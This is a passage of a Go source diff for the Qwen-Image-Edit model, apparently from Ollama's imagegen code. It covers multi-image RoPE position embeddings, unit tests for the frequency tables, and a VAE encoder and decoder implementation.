// PrepareRoPEMultiImage computes RoPE with interpolation for image editing.
// Handles single or multiple input images with different resolutions.
//
// Parameters:
// - outPH, outPW: output patch dimensions (noise latent resolution)
// - inputDims: patch dimensions for each input image [(pH1, pW1), (pH2, pW2), ...]
// - txtLen: text sequence length
// - axesDims: RoPE axis dimensions [16, 56, 56]
//
// Returns RoPE cache where:
// - ImgFreqs has (outPH*outPW + sum(inPH*inPW for each image)) positions
// - First outPH*outPW positions are for noise latents (standard RoPE at output res)
// - Following positions are for each input image (interpolated from output res)
func PrepareRoPEMultiImage(outPH, outPW int32, inputDims []ImageDims, txtLen int32, axesDims []int32) *qwen_image.RoPECache {
theta := float64(10000)
maxIdx := int32(4096)
// Compute base frequencies for each axis dimension
freqsT := qwen_image.ComputeAxisFreqs(axesDims[0], theta)
freqsH := qwen_image.ComputeAxisFreqs(axesDims[1], theta)
freqsW := qwen_image.ComputeAxisFreqs(axesDims[2], theta)
// Build frequency lookup tables
posFreqsT := qwen_image.MakeFreqTable(maxIdx, freqsT, false)
posFreqsH := qwen_image.MakeFreqTable(maxIdx, freqsH, false)
posFreqsW := qwen_image.MakeFreqTable(maxIdx, freqsW, false)
negFreqsT := qwen_image.MakeFreqTable(maxIdx, freqsT, true) // For frame -1 on last condition image
negFreqsH := qwen_image.MakeFreqTable(maxIdx, freqsH, true)
negFreqsW := qwen_image.MakeFreqTable(maxIdx, freqsW, true)
headDim := int32(len(freqsT)+len(freqsH)+len(freqsW)) * 2
// Helper to compute RoPE for a single position at output resolution with scale_rope
computePosFreqs := func(framePos, y, x int32) []float32 {
row := make([]float32, headDim)
idx := 0
// Frame position
for i := 0; i < len(freqsT)*2; i++ {
row[idx+i] = posFreqsT[framePos][i]
}
idx += len(freqsT) * 2
// Height with scale_rope centering (using OUTPUT dimensions)
outHHalf := outPH / 2
hNegCount := outPH - outHHalf
if y < hNegCount {
negTableIdx := maxIdx - hNegCount + y
for i := 0; i < len(freqsH)*2; i++ {
row[idx+i] = negFreqsH[negTableIdx][i]
}
} else {
posIdx := y - hNegCount
for i := 0; i < len(freqsH)*2; i++ {
row[idx+i] = posFreqsH[posIdx][i]
}
}
idx += len(freqsH) * 2
// Width with scale_rope centering (using OUTPUT dimensions)
outWHalf := outPW / 2
wNegCount := outPW - outWHalf
if x < wNegCount {
negTableIdx := maxIdx - wNegCount + x
for i := 0; i < len(freqsW)*2; i++ {
row[idx+i] = negFreqsW[negTableIdx][i]
}
} else {
posIdx := x - wNegCount
for i := 0; i < len(freqsW)*2; i++ {
row[idx+i] = posFreqsW[posIdx][i]
}
}
return row
}
// Helper to compute RoPE for frame -1 (used for last condition image)
// This matches Python's _compute_condition_freqs which uses freqs_neg[0][-1:]
computeNegFrameFreqs := func(y, x int32) []float32 {
row := make([]float32, headDim)
idx := 0
// Frame -1: use last row of negative frame frequencies
negFrameIdx := maxIdx - 1
for i := 0; i < len(freqsT)*2; i++ {
row[idx+i] = negFreqsT[negFrameIdx][i]
}
idx += len(freqsT) * 2
// Height with scale_rope centering (using OUTPUT dimensions)
outHHalf := outPH / 2
hNegCount := outPH - outHHalf
if y < hNegCount {
negTableIdx := maxIdx - hNegCount + y
for i := 0; i < len(freqsH)*2; i++ {
row[idx+i] = negFreqsH[negTableIdx][i]
}
} else {
posIdx := y - hNegCount
for i := 0; i < len(freqsH)*2; i++ {
row[idx+i] = posFreqsH[posIdx][i]
}
}
idx += len(freqsH) * 2
// Width with scale_rope centering (using OUTPUT dimensions)
outWHalf := outPW / 2
wNegCount := outPW - outWHalf
if x < wNegCount {
negTableIdx := maxIdx - wNegCount + x
for i := 0; i < len(freqsW)*2; i++ {
row[idx+i] = negFreqsW[negTableIdx][i]
}
} else {
posIdx := x - wNegCount
for i := 0; i < len(freqsW)*2; i++ {
row[idx+i] = posFreqsW[posIdx][i]
}
}
return row
}
// Total image sequence length: noise + all input images
noiseSeqLen := outPH * outPW
totalImgLen := noiseSeqLen
for _, dims := range inputDims {
totalImgLen += dims.PatchH * dims.PatchW
}
imgFreqsData := make([]float32, totalImgLen*headDim)
idx := int32(0)
// Segment 0: Noise latents - standard RoPE at output resolution (frame 0)
for y := int32(0); y < outPH; y++ {
for x := int32(0); x < outPW; x++ {
row := computePosFreqs(0, y, x)
copy(imgFreqsData[idx:], row)
idx += headDim
}
}
// Segments 1..N: Edit image latents - INTERPOLATED RoPE
// For single image: use frame 1 (matches original PrepareRoPEInterpolated)
// For multiple images: Python uses frame -1 for the LAST condition image
// (_compute_condition_freqs), positive indices for others.
numImages := len(inputDims)
lastImgIdx := numImages - 1
for imgIdx, dims := range inputDims {
inPH := dims.PatchH
inPW := dims.PatchW
// Determine frame index for this image
// Single image case: use frame 1 (like original PrepareRoPEInterpolated)
// Multi-image case: last image uses frame -1, others use frame 1, 2, etc.
useNegFrame := numImages > 1 && imgIdx == lastImgIdx
// Map each input position to an output position using linear interpolation
for y := int32(0); y < inPH; y++ {
for x := int32(0); x < inPW; x++ {
// Interpolate: map input (y, x) to output grid position
// This is the key fix from DiffSynth's forward_sampling
var yOut, xOut int32
if inPH == 1 {
yOut = 0
} else {
// Linear interpolation: y_out = y * (outPH - 1) / (inPH - 1)
yOut = y * (outPH - 1) / (inPH - 1)
}
if inPW == 1 {
xOut = 0
} else {
xOut = x * (outPW - 1) / (inPW - 1)
}
var row []float32
if useNegFrame {
// Last image in multi-image uses frame -1
row = computeNegFrameFreqs(yOut, xOut)
} else {
// Single image uses frame 1, multi-image uses frame 1, 2, etc.
frameIdx := int32(imgIdx + 1)
row = computePosFreqs(frameIdx, yOut, xOut)
}
copy(imgFreqsData[idx:], row)
idx += headDim
}
}
}
imgFreqs := mlx.NewArray(imgFreqsData, []int32{totalImgLen, headDim})
imgFreqs = mlx.ToBFloat16(imgFreqs)
// Text frequencies - start after max video index
maxVidIdx := max(outPH/2, outPW/2)
txtFreqsData := make([]float32, txtLen*headDim)
idx = 0
for t := int32(0); t < txtLen; t++ {
pos := maxVidIdx + t
for i := 0; i < len(freqsT)*2; i++ {
txtFreqsData[idx+int32(i)] = posFreqsT[pos][i]
}
idx += int32(len(freqsT) * 2)
for i := 0; i < len(freqsH)*2; i++ {
txtFreqsData[idx+int32(i)] = posFreqsH[pos][i]
}
idx += int32(len(freqsH) * 2)
for i := 0; i < len(freqsW)*2; i++ {
txtFreqsData[idx+int32(i)] = posFreqsW[pos][i]
}
idx += int32(len(freqsW) * 2)
}
txtFreqs := mlx.NewArray(txtFreqsData, []int32{txtLen, headDim})
txtFreqs = mlx.ToBFloat16(txtFreqs)
return &qwen_image.RoPECache{
ImgFreqs: imgFreqs,
TxtFreqs: txtFreqs,
}
}

View File

@@ -1,227 +0,0 @@
//go:build mlx
package qwen_image_edit
import (
"math"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/models/qwen_image"
)
// TestComputeAxisFreqs verifies frequency computation matches Python reference
func TestComputeAxisFreqs(t *testing.T) {
theta := float64(10000)
// Expected values from Python:
// freqs = 1.0 / (theta ** (np.arange(0, half_dim) / half_dim))
expectedFreqsT := []float64{
1.000000000000000, 0.316227766016838, 0.100000000000000, 0.031622776601684,
0.010000000000000, 0.003162277660168, 0.001000000000000, 0.000316227766017,
}
expectedFreqsH_first4 := []float64{
1.000000000000000, 0.719685673001152, 0.517947467923121, 0.372759372031494,
}
expectedFreqsH_last4 := []float64{
0.000372759372031, 0.000268269579528, 0.000193069772888, 0.000138949549437,
}
// Test temporal frequencies (dim=16)
freqsT := qwen_image.ComputeAxisFreqs(16, theta)
if len(freqsT) != 8 {
t.Fatalf("expected 8 temporal frequencies, got %d", len(freqsT))
}
for i, expected := range expectedFreqsT {
if diff := math.Abs(freqsT[i] - expected); diff > 1e-10 {
t.Errorf("freqsT[%d]: expected %.15f, got %.15f, diff %.2e", i, expected, freqsT[i], diff)
}
}
// Test height/width frequencies (dim=56)
freqsH := qwen_image.ComputeAxisFreqs(56, theta)
if len(freqsH) != 28 {
t.Fatalf("expected 28 height frequencies, got %d", len(freqsH))
}
for i, expected := range expectedFreqsH_first4 {
if diff := math.Abs(freqsH[i] - expected); diff > 1e-10 {
t.Errorf("freqsH[%d]: expected %.15f, got %.15f, diff %.2e", i, expected, freqsH[i], diff)
}
}
for i, expected := range expectedFreqsH_last4 {
idx := 24 + i // last 4 of 28
if diff := math.Abs(freqsH[idx] - expected); diff > 1e-10 {
t.Errorf("freqsH[%d]: expected %.15f, got %.15f, diff %.2e", idx, expected, freqsH[idx], diff)
}
}
}
// TestMakeFreqTable verifies the frequency lookup table for both positive and negative positions
func TestMakeFreqTable(t *testing.T) {
theta := float64(10000)
freqsT := qwen_image.ComputeAxisFreqs(16, theta)
maxIdx := int32(4096)
// Test positive table
posTable := qwen_image.MakeFreqTable(maxIdx, freqsT, false)
// Position 0 should give cos=1, sin=0 for all frequencies
for i := 0; i < len(freqsT)*2; i += 2 {
if posTable[0][i] != 1.0 {
t.Errorf("posTable[0][%d] (cos): expected 1.0, got %f", i, posTable[0][i])
}
if posTable[0][i+1] != 0.0 {
t.Errorf("posTable[0][%d] (sin): expected 0.0, got %f", i+1, posTable[0][i+1])
}
}
// Position 1, first frequency (1.0): angle = 1*1 = 1
// cos(1) = 0.5403, sin(1) = 0.8415
if diff := math.Abs(float64(posTable[1][0]) - 0.5403023058681398); diff > 1e-6 {
t.Errorf("posTable[1][0] (cos): expected 0.5403, got %f", posTable[1][0])
}
if diff := math.Abs(float64(posTable[1][1]) - 0.8414709848078965); diff > 1e-6 {
t.Errorf("posTable[1][1] (sin): expected 0.8415, got %f", posTable[1][1])
}
// Test negative table
negTable := qwen_image.MakeFreqTable(maxIdx, freqsT, true)
// negTable[4095] corresponds to position -1
// cos(-1) = cos(1), sin(-1) = -sin(1)
if diff := math.Abs(float64(negTable[4095][0]) - 0.5403023058681398); diff > 1e-6 {
t.Errorf("negTable[4095][0] (cos(-1)): expected 0.5403, got %f", negTable[4095][0])
}
if diff := math.Abs(float64(negTable[4095][1]) - (-0.8414709848078965)); diff > 1e-6 {
t.Errorf("negTable[4095][1] (sin(-1)): expected -0.8415, got %f", negTable[4095][1])
}
// negTable[4094] corresponds to position -2
// cos(-2) = cos(2), sin(-2) = -sin(2)
cos2 := math.Cos(2.0)
sin2 := math.Sin(2.0)
if diff := math.Abs(float64(negTable[4094][0]) - cos2); diff > 1e-6 {
t.Errorf("negTable[4094][0] (cos(-2)): expected %f, got %f", cos2, negTable[4094][0])
}
if diff := math.Abs(float64(negTable[4094][1]) - (-sin2)); diff > 1e-6 {
t.Errorf("negTable[4094][1] (sin(-2)): expected %f, got %f", -sin2, negTable[4094][1])
}
}
// TestPrepareRoPE_QwenImage verifies qwen_image.PrepareRoPE for single-segment case
func TestPrepareRoPE_QwenImage(t *testing.T) {
if !mlx.GPUIsAvailable() {
t.Skip("GPU not available")
}
mlx.SetDefaultDeviceCPU()
// 4x4 patch grid, single image
imgH, imgW := int32(4), int32(4)
txtLen := int32(5)
axesDims := []int32{16, 56, 56}
cache := qwen_image.PrepareRoPE(imgH, imgW, txtLen, axesDims)
mlx.Eval(cache.ImgFreqs, cache.TxtFreqs)
// Check shapes
imgShape := cache.ImgFreqs.Shape()
if imgShape[0] != 16 { // 4*4 patches
t.Errorf("ImgFreqs seq len: expected 16, got %d", imgShape[0])
}
// For single image (frame=0), all temporal values should be cos=1, sin=0
imgFreqsCPU := mlx.AsType(cache.ImgFreqs, mlx.DtypeFloat32)
mlx.Eval(imgFreqsCPU)
imgData := imgFreqsCPU.Data()
// Check first 16 values of patch 0 (temporal cos/sin pairs)
for i := 0; i < 16; i += 2 {
cosVal := imgData[i]
sinVal := imgData[i+1]
if diff := math.Abs(float64(cosVal - 1.0)); diff > 1e-5 {
t.Errorf("ImgFreqs[0][%d] (cos): expected 1.0, got %f", i, cosVal)
}
if diff := math.Abs(float64(sinVal - 0.0)); diff > 1e-5 {
t.Errorf("ImgFreqs[0][%d] (sin): expected 0.0, got %f", i+1, sinVal)
}
}
cache.ImgFreqs.Free()
cache.TxtFreqs.Free()
}
// TestScaleRopePositions verifies the centered position calculation for scale_rope=True
func TestScaleRopePositions(t *testing.T) {
// For a 4x4 grid with scale_rope=True:
// hHalf = 2, wHalf = 2
// hNegCount = 4 - 2 = 2 (positions 0,1 are negative)
// wNegCount = 4 - 2 = 2 (positions 0,1 are negative)
//
// Height positions:
// y=0: -(4-2) + 0 = -2
// y=1: -(4-2) + 1 = -1
// y=2: 2 - 2 = 0
// y=3: 3 - 2 = 1
//
// Same for width
pH, pW := int32(4), int32(4)
hHalf := pH / 2
wHalf := pW / 2
hNegCount := pH - hHalf
wNegCount := pW - wHalf
expectedH := []int32{-2, -1, 0, 1}
expectedW := []int32{-2, -1, 0, 1}
for y := int32(0); y < pH; y++ {
var hPos int32
if y < hNegCount {
hPos = -(pH - hHalf) + y
} else {
hPos = y - hNegCount
}
if hPos != expectedH[y] {
t.Errorf("y=%d: expected h_pos=%d, got %d", y, expectedH[y], hPos)
}
}
for x := int32(0); x < pW; x++ {
var wPos int32
if x < wNegCount {
wPos = -(pW - wHalf) + x
} else {
wPos = x - wNegCount
}
if wPos != expectedW[x] {
t.Errorf("x=%d: expected w_pos=%d, got %d", x, expectedW[x], wPos)
}
}
}
// TestRoPEHeadDimensions verifies the head dimension breakdown
func TestRoPEHeadDimensions(t *testing.T) {
// axes_dims_rope = [16, 56, 56]
// Each dimension uses half the values for frequencies
// So we get: 8 + 28 + 28 = 64 frequency values
// Each frequency produces cos + sin, so: 64 * 2 = 128 total values per position
axesDims := []int32{16, 56, 56}
expectedFreqs := (axesDims[0]/2 + axesDims[1]/2 + axesDims[2]/2)
expectedHeadDim := expectedFreqs * 2
if expectedFreqs != 64 {
t.Errorf("expected 64 frequency values, got %d", expectedFreqs)
}
if expectedHeadDim != 128 {
t.Errorf("expected head_dim=128, got %d", expectedHeadDim)
}
// This should match the transformer's attention head dimension
// hidden_size = 3072, num_heads = 24
// head_dim = 3072 / 24 = 128
}

View File

@@ -1,642 +0,0 @@
//go:build mlx
package qwen_image_edit
import (
"fmt"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// VAEConfig holds Qwen-Image VAE configuration
type VAEConfig struct {
ZDim int32 `json:"z_dim"` // 16
BaseDim int32 `json:"base_dim"` // 96
DimMult []int32 `json:"dim_mult"` // [1, 2, 4, 4]
NumResBlocks int32 `json:"num_res_blocks"` // 2
LatentsMean []float32 `json:"latents_mean"` // 16 values
LatentsStd []float32 `json:"latents_std"` // 16 values
TemperalDownsample []bool `json:"temperal_downsample"` // [false, true, true]
}
// defaultVAEConfig returns config for Qwen-Image VAE
func defaultVAEConfig() *VAEConfig {
return &VAEConfig{
ZDim: 16,
BaseDim: 96,
DimMult: []int32{1, 2, 4, 4},
NumResBlocks: 2,
LatentsMean: []float32{
-0.7571, -0.7089, -0.9113, 0.1075,
-0.1745, 0.9653, -0.1517, 1.5508,
0.4134, -0.0715, 0.5517, -0.3632,
-0.1922, -0.9497, 0.2503, -0.2921,
},
LatentsStd: []float32{
2.8184, 1.4541, 2.3275, 2.6558,
1.2196, 1.7708, 2.6052, 2.0743,
3.2687, 2.1526, 2.8652, 1.5579,
1.6382, 1.1253, 2.8251, 1.916,
},
TemperalDownsample: []bool{false, true, true},
}
}
// VAE is the full VAE with encoder and decoder
type VAE struct {
Config *VAEConfig
Encoder *VAEEncoder
Decoder *VAEDecoder
}
// Load loads the VAE from a directory
func (m *VAE) Load(path string) error {
fmt.Println("Loading Qwen-Image-Edit VAE (encoder + decoder)...")
cfg := defaultVAEConfig()
m.Config = cfg
weights, err := safetensors.LoadModelWeights(path)
if err != nil {
return fmt.Errorf("weights: %w", err)
}
// Load weights as f32 for quality (matches Python default behavior)
// VAE decoder precision is critical for final image quality
fmt.Print(" Loading weights as f32... ")
if err := weights.Load(mlx.DtypeFloat32); err != nil {
return fmt.Errorf("failed to load weights: %w", err)
}
fmt.Printf("✓ (%.1f GB)\n", float64(mlx.MetalGetActiveMemory())/(1024*1024*1024))
// Load encoder
fmt.Print(" Loading encoder... ")
m.Encoder = &VAEEncoder{}
if err := m.Encoder.loadFromWeights(weights, cfg); err != nil {
return fmt.Errorf("encoder: %w", err)
}
fmt.Println("✓")
// Load decoder
fmt.Print(" Loading decoder... ")
m.Decoder = &VAEDecoder{}
if err := m.Decoder.loadFromWeights(weights, cfg); err != nil {
return fmt.Errorf("decoder: %w", err)
}
fmt.Println("✓")
weights.ReleaseAll()
return nil
}
// Encode encodes an image to latents
// x: [B, C, T, H, W] image tensor in [-1, 1] range
// Returns: [B, C, T, H/8, W/8] latents (unnormalized)
func (m *VAE) Encode(x *mlx.Array) *mlx.Array {
return m.Encoder.Encode(x)
}
// Decode decodes latents to image
// z: [B, C, T, H, W] latents (denormalized)
// Returns: [B, C, T, H*8, W*8] image in [-1, 1]
func (m *VAE) Decode(z *mlx.Array) *mlx.Array {
return m.Decoder.Decode(z)
}
// Normalize applies latent normalization
// Input z should be f32 (from VAE encoder), output is f32 for transformer
func (m *VAE) Normalize(z *mlx.Array) *mlx.Array {
shape := z.Shape()
C := shape[1]
mean := mlx.NewArray(m.Config.LatentsMean[:C], []int32{1, C, 1, 1, 1})
std := mlx.NewArray(m.Config.LatentsStd[:C], []int32{1, C, 1, 1, 1})
// Mean/std are f32, will match z dtype through broadcasting
return mlx.Div(mlx.Sub(z, mean), std)
}
// Denormalize reverses latent normalization
// Input z is bf16 (from transformer), output converted to f32 for VAE decoder
func (m *VAE) Denormalize(z *mlx.Array) *mlx.Array {
shape := z.Shape()
C := shape[1]
// Convert latents to f32 for VAE decoder quality
z = mlx.AsType(z, mlx.DtypeFloat32)
mean := mlx.NewArray(m.Config.LatentsMean[:C], []int32{1, C, 1, 1, 1})
std := mlx.NewArray(m.Config.LatentsStd[:C], []int32{1, C, 1, 1, 1})
return mlx.Add(mlx.Mul(z, std), mean)
}
// VAEEncoder is the encoder part of the VAE
// The encoder uses a flat structure where down_blocks contains a mix of ResBlocks and Downsamplers:
// - Blocks 0,1: ResBlocks (base_dim)
// - Block 2: Downsample
// - Blocks 3,4: ResBlocks (base_dim*2)
// - Block 5: Downsample + temporal
// - Blocks 6,7: ResBlocks (base_dim*4)
// - Block 8: Downsample + temporal
// - Blocks 9,10: ResBlocks (base_dim*4)
type VAEEncoder struct {
Config *VAEConfig
ConvIn *CausalConv3d
Blocks []EncoderBlock // Flat list of ResBlocks and Downsamplers
MidBlock *MidBlock
NormOut *RMSNorm3D
ConvOut *CausalConv3d
QuantConv *CausalConv3d
}
// EncoderBlock is either a ResBlock or a Downsample
type EncoderBlock interface {
Forward(x *mlx.Array) *mlx.Array
IsDownsample() bool
}
// EncoderResBlock wraps ResBlock
type EncoderResBlock struct {
*ResBlock
}
func (b *EncoderResBlock) IsDownsample() bool { return false }
// EncoderDownsample is a downsample layer
type EncoderDownsample struct {
Resample *CausalConv3d
TimeConv *CausalConv3d // Optional temporal downsample
}
func (d *EncoderDownsample) IsDownsample() bool { return true }
func (d *EncoderDownsample) Forward(x *mlx.Array) *mlx.Array {
// Spatial downsample with stride 2
// WAN VAE uses: ZeroPad2d(0,1,0,1) + Conv2d(3x3, stride=2)
x = d.forwardSpatialDownsample(x)
// NOTE: In WAN VAE, time_conv is ONLY used in streaming/chunked mode
// with feat_cache. For single-frame encoding (T=1), time_conv is skipped.
// The Python forward checks: if feat_cache is not None ... then use time_conv
// Since we don't support streaming, we skip time_conv entirely.
return x
}
// forwardSpatialDownsample applies 2D conv with stride 2 for spatial downsampling
func (d *EncoderDownsample) forwardSpatialDownsample(x *mlx.Array) *mlx.Array {
xShape := x.Shape()
B := xShape[0]
T := xShape[1]
H := xShape[2]
W := xShape[3]
C := xShape[4]
wShape := d.Resample.Weight.Shape()
outC := wShape[0]
// Reshape to [B*T, H, W, C] for 2D conv
x = mlx.Reshape(x, B*T, H, W, C)
// Asymmetric padding: pad right and bottom by 1 (WAN VAE style)
// ZeroPad2d(0, 1, 0, 1) means (left=0, right=1, top=0, bottom=1)
x = mlx.Pad(x, []int32{0, 0, 0, 1, 0, 1, 0, 0}) // [B, H, W, C] -> pad H and W
// Apply 2D conv with stride 2
weight := mlx.Transpose(d.Resample.Weight, 0, 2, 3, 1) // [O, I, kH, kW] -> [O, kH, kW, I]
x = conv2DStrided(x, weight, 2)
if d.Resample.Bias != nil {
bias := mlx.Reshape(d.Resample.Bias, 1, 1, 1, outC)
x = mlx.Add(x, bias)
}
// Output dims after stride 2: (H+1)/2, (W+1)/2
outH := (H + 1) / 2
outW := (W + 1) / 2
// Reshape back to [B, T, H', W', C]
x = mlx.Reshape(x, B, T, outH, outW, outC)
mlx.Eval(x)
return x
}
// loadFromWeights loads the encoder from pre-loaded weights
func (e *VAEEncoder) loadFromWeights(weights *safetensors.ModelWeights, cfg *VAEConfig) error {
e.Config = cfg
// Conv in
convIn, err := newCausalConv3d(weights, "encoder.conv_in")
if err != nil {
return err
}
e.ConvIn = convIn
// Encoder uses flat block structure:
// dim_mult = [1, 2, 4, 4], num_res_blocks = 2, temporal_downsample = [false, true, true]
// Block layout: res,res,down, res,res,down+t, res,res,down+t, res,res
// That's 11 blocks: 0,1=res, 2=down, 3,4=res, 5=down+t, 6,7=res, 8=down+t, 9,10=res
e.Blocks = make([]EncoderBlock, 0, 11)
// Track dimensions
dims := []int32{cfg.BaseDim, cfg.BaseDim * 2, cfg.BaseDim * 4, cfg.BaseDim * 4}
blockIdx := 0
for stage := 0; stage < len(cfg.DimMult); stage++ {
inDim := cfg.BaseDim
if stage > 0 {
inDim = dims[stage-1]
}
outDim := dims[stage]
// ResBlocks for this stage (num_res_blocks per stage)
for r := int32(0); r < cfg.NumResBlocks; r++ {
prefix := fmt.Sprintf("encoder.down_blocks.%d", blockIdx)
currentInDim := inDim
if r > 0 {
currentInDim = outDim
}
block, err := newEncoderResBlock(weights, prefix, currentInDim, outDim)
if err != nil {
return fmt.Errorf("encoder res block %d: %w", blockIdx, err)
}
e.Blocks = append(e.Blocks, block)
blockIdx++
}
// Downsample after each stage except the last
if stage < len(cfg.DimMult)-1 {
prefix := fmt.Sprintf("encoder.down_blocks.%d", blockIdx)
down, err := newEncoderDownsample(weights, prefix, cfg.TemperalDownsample[stage])
if err != nil {
return fmt.Errorf("encoder downsample %d: %w", blockIdx, err)
}
e.Blocks = append(e.Blocks, down)
blockIdx++
}
}
// Mid block
midDim := cfg.BaseDim * cfg.DimMult[len(cfg.DimMult)-1]
midBlock, err := newMidBlock(weights, "encoder.mid_block", midDim)
if err != nil {
return err
}
e.MidBlock = midBlock
// Norm out
normOut, err := newRMSNorm3D(weights, "encoder.norm_out", midDim)
if err != nil {
return err
}
e.NormOut = normOut
// Conv out
convOut, err := newCausalConv3d(weights, "encoder.conv_out")
if err != nil {
return err
}
e.ConvOut = convOut
// Quant conv
quantConv, err := newCausalConv3d(weights, "quant_conv")
if err != nil {
return err
}
e.QuantConv = quantConv
return nil
}
// newEncoderResBlock creates a ResBlock for the encoder (flat structure)
func newEncoderResBlock(weights *safetensors.ModelWeights, prefix string, inDim, outDim int32) (*EncoderResBlock, error) {
block, err := newResBlock(weights, prefix, inDim, outDim)
if err != nil {
return nil, err
}
return &EncoderResBlock{block}, nil
}
// newEncoderDownsample creates a downsample layer for the encoder
func newEncoderDownsample(weights *safetensors.ModelWeights, prefix string, temporal bool) (*EncoderDownsample, error) {
resample, err := newCausalConv3d(weights, prefix+".resample.1")
if err != nil {
return nil, err
}
var timeConv *CausalConv3d
if temporal {
timeConv, _ = newCausalConv3d(weights, prefix+".time_conv")
}
return &EncoderDownsample{
Resample: resample,
TimeConv: timeConv,
}, nil
}
// Encode encodes an image to latents
// x: [B, C, T, H, W] image tensor (channels-first)
// Returns: [B, latent_C, T, H/8, W/8] latent distribution mode
func (e *VAEEncoder) Encode(x *mlx.Array) *mlx.Array {
// Convert from channels-first [N, C, T, H, W] to channels-last [N, T, H, W, C]
x = mlx.Contiguous(mlx.Transpose(x, 0, 2, 3, 4, 1))
mlx.Eval(x)
// Conv in
x = e.ConvIn.Forward(x)
// Encoder blocks (mix of ResBlocks and Downsamplers)
for _, block := range e.Blocks {
prev := x
x = block.Forward(x)
prev.Free()
}
// Mid block
x = e.MidBlock.Forward(x)
// Norm + silu
{
prev := x
x = e.NormOut.Forward(x)
x = silu3D(x)
prev.Free()
mlx.Eval(x)
}
// Conv out
{
prev := x
x = e.ConvOut.Forward(x)
prev.Free()
}
// Quant conv
{
prev := x
x = e.QuantConv.Forward(x)
prev.Free()
}
// Get mode from distribution (first half of channels = mean)
// Output is [B, T, H, W, 2*latent_C], we take first latent_C channels
shape := x.Shape()
latentC := shape[4] / 2
x = mlx.Slice(x, []int32{0, 0, 0, 0, 0}, []int32{shape[0], shape[1], shape[2], shape[3], latentC})
// Convert back to channels-first [N, C, T, H, W]
x = mlx.Contiguous(mlx.Transpose(x, 0, 4, 1, 2, 3))
mlx.Eval(x)
return x
}
// VAEDecoder is the decoder part of the VAE
type VAEDecoder struct {
Config *VAEConfig
PostQuantConv *CausalConv3d
ConvIn *CausalConv3d
MidBlock *MidBlock
UpBlocks []*UpBlock
NormOut *RMSNorm3D
ConvOut *CausalConv3d
}
// loadFromWeights loads the decoder from pre-loaded weights
func (d *VAEDecoder) loadFromWeights(weights *safetensors.ModelWeights, cfg *VAEConfig) error {
d.Config = cfg
postQuantConv, err := newCausalConv3d(weights, "post_quant_conv")
if err != nil {
return err
}
d.PostQuantConv = postQuantConv
convIn, err := newCausalConv3d(weights, "decoder.conv_in")
if err != nil {
return err
}
d.ConvIn = convIn
// Mid block
midDim := cfg.BaseDim * cfg.DimMult[len(cfg.DimMult)-1]
midBlock, err := newMidBlock(weights, "decoder.mid_block", midDim)
if err != nil {
return err
}
d.MidBlock = midBlock
// Up blocks (reversed dim_mult)
numUpBlocks := len(cfg.DimMult)
d.UpBlocks = make([]*UpBlock, numUpBlocks)
dimsMult := make([]int32, numUpBlocks+1)
dimsMult[0] = cfg.DimMult[numUpBlocks-1]
for i := 0; i < numUpBlocks; i++ {
dimsMult[i+1] = cfg.DimMult[numUpBlocks-1-i]
}
temporalUpsample := make([]bool, len(cfg.TemperalDownsample))
for i := range cfg.TemperalDownsample {
temporalUpsample[i] = cfg.TemperalDownsample[len(cfg.TemperalDownsample)-1-i]
}
for i := 0; i < numUpBlocks; i++ {
inDim := cfg.BaseDim * dimsMult[i]
outDim := cfg.BaseDim * dimsMult[i+1]
if i > 0 {
inDim = inDim / 2
}
upsampleMode := ""
if i < numUpBlocks-1 {
if temporalUpsample[i] {
upsampleMode = "upsample3d"
} else {
upsampleMode = "upsample2d"
}
}
prefix := fmt.Sprintf("decoder.up_blocks.%d", i)
upBlock, err := newUpBlock(weights, prefix, inDim, outDim, cfg.NumResBlocks, upsampleMode)
if err != nil {
return err
}
d.UpBlocks[i] = upBlock
}
normOut, err := newRMSNorm3D(weights, "decoder.norm_out", cfg.BaseDim)
if err != nil {
return err
}
d.NormOut = normOut
convOut, err := newCausalConv3d(weights, "decoder.conv_out")
if err != nil {
return err
}
d.ConvOut = convOut
return nil
}
// Decode converts latents to image
// z: [B, C, T, H, W] denormalized latents
func (d *VAEDecoder) Decode(z *mlx.Array) *mlx.Array {
var x *mlx.Array
// Convert from channels-first to channels-last
{
z = mlx.Contiguous(mlx.Transpose(z, 0, 2, 3, 4, 1))
mlx.Eval(z)
}
// PostQuantConv
x = d.PostQuantConv.Forward(z)
z.Free()
// ConvIn
{
prev := x
x = d.ConvIn.Forward(x)
prev.Free()
}
// Mid block
x = d.MidBlock.Forward(x)
// Up blocks
for _, upBlock := range d.UpBlocks {
x = upBlock.Forward(x)
}
// NormOut + silu
{
prev := x
x = d.NormOut.Forward(x)
x = silu3D(x)
prev.Free()
mlx.Eval(x)
}
// ConvOut
{
prev := x
x = d.ConvOut.Forward(x)
prev.Free()
}
// Post-processing: clamp and convert back to channels-first
{
prev := x
x = mlx.ClipScalar(x, -1.0, 1.0, true, true)
x = mlx.Contiguous(mlx.Transpose(x, 0, 4, 1, 2, 3))
prev.Free()
mlx.Eval(x)
}
return x
}
// DownBlock handles downsampling in encoder
type DownBlock struct {
ResBlocks []*ResBlock
Downsampler *Downsample
}
// newDownBlock creates a down block
func newDownBlock(weights *safetensors.ModelWeights, prefix string, inDim, outDim int32, numBlocks int32, downsampleMode string) (*DownBlock, error) {
resBlocks := make([]*ResBlock, numBlocks+1)
currentDim := inDim
for i := int32(0); i <= numBlocks; i++ {
resPrefix := fmt.Sprintf("%s.resnets.%d", prefix, i)
block, err := newResBlock(weights, resPrefix, currentDim, outDim)
if err != nil {
return nil, err
}
resBlocks[i] = block
currentDim = outDim
}
var downsampler *Downsample
if downsampleMode != "" {
downsampler = newDownsample(weights, prefix+".downsamplers.0", outDim, downsampleMode)
}
return &DownBlock{
ResBlocks: resBlocks,
Downsampler: downsampler,
}, nil
}
// Forward applies down block
func (d *DownBlock) Forward(x *mlx.Array) *mlx.Array {
for _, block := range d.ResBlocks {
prev := x
x = block.Forward(x)
prev.Free()
}
if d.Downsampler != nil {
prev := x
x = d.Downsampler.Forward(x)
prev.Free()
}
return x
}
// Downsample handles spatial downsampling
type Downsample struct {
Conv *mlx.Array
Bias *mlx.Array
Mode string
}
// newDownsample creates a downsampler
func newDownsample(weights *safetensors.ModelWeights, prefix string, dim int32, mode string) *Downsample {
conv, _ := weights.Get(prefix + ".resample.1.weight")
bias, _ := weights.Get(prefix + ".resample.1.bias")
return &Downsample{
Conv: conv,
Bias: bias,
Mode: mode,
}
}
// Forward applies downsampling to channels-last input [B, T, H, W, C]
